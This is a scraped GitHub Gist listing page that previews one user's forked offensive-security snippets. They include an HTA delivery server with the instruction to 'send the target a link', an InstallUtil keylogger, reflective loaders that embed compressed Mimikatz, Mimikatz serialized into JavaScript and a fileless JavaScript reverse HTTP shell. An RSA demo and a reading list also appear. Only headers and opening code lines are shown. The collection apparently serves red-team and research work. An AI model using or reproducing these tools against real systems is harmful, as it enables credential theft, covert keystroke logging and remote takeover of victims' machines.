Skip to content

Instantly share code, notes, and snippets.

<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
function Receive-Request {
param(
$Request
)
$output = ""
@DanielRTeixeira
DanielRTeixeira / RSAGuts.ps1
Created November 2, 2017 15:27 — forked from nicholasmckinney/RSAGuts.ps1
RSA Algorithm in PowerShell. Just Cause
<#
Created By Casey Smith
@subTee
RSA in PowerShell.
Just Cause...
Reference notes for the curious
p = 61 <= first prime number (destroy this after computing e and d)
q = 53 <= second prime number (destroy this after computing e and d)
@DanielRTeixeira
DanielRTeixeira / iukl.cs
Created November 2, 2017 15:27 — forked from nicholasmckinney/iukl.cs
InstallUtil Keylogger/MouseClick Recorder - Stores Logs in [Documents\Klog-Logs]
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
@DanielRTeixeira
DanielRTeixeira / PELoader.cs
Created November 2, 2017 15:27 — forked from nicholasmckinney/PELoader.cs
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@DanielRTeixeira
DanielRTeixeira / list
Created November 2, 2017 15:27 — forked from nicholasmckinney/list
Infosec Team - Book List
Infosec Team Book List
The Cuckoo's Egg - Cliff Stoll
Hacking, The Art of Exploitation - Jon Ericson
Art of Memory Forensics - by Michael Hale Ligh, Andrew Case, Jamie Levy, AAron Walters
Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground - Kevin Poulsen
Ghost in the Wires: My Adventures as the World's Most Wanted Hacker - Kevin Mitnick
Daemon - Daniel Suarez
@DanielRTeixeira
DanielRTeixeira / InterceptorCertGen.ps1
Created November 2, 2017 15:27 — forked from nicholasmckinney/InterceptorCertGen.ps1
Windows Nano Server - Certificate Generation and Installation
function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA)
{
$CAsubject = $certSubject
$dn = new-object -com "X509Enrollment.CX500DistinguishedName"
$dn.Encode( "CN=" + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
#Issuer Property for cleanup
$issuer = "__Interceptor_Trusted_Root"
$issuerdn = new-object -com "X509Enrollment.CX500DistinguishedName"
$issuerdn.Encode("CN=" + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
# Create a new Private Key
@DanielRTeixeira
DanielRTeixeira / Utility.cs
Created November 2, 2017 15:27 — forked from nicholasmckinney/Utility.cs
InstallUtility Functions
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
@DanielRTeixeira
DanielRTeixeira / JSRat.ps1
Created November 2, 2017 15:26 — forked from nicholasmckinney/JSRat.ps1
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.
@DanielRTeixeira
DanielRTeixeira / katz.js
Created November 2, 2017 15:26 — forked from nicholasmckinney/katz.js
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
@DanielRTeixeira
DanielRTeixeira / katz.cs
Created November 2, 2017 15:25 — forked from nicholasmckinney/katz.cs
.NET 2.0.50727 Mimikatz Extract and Execute -
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Security.Cryptography;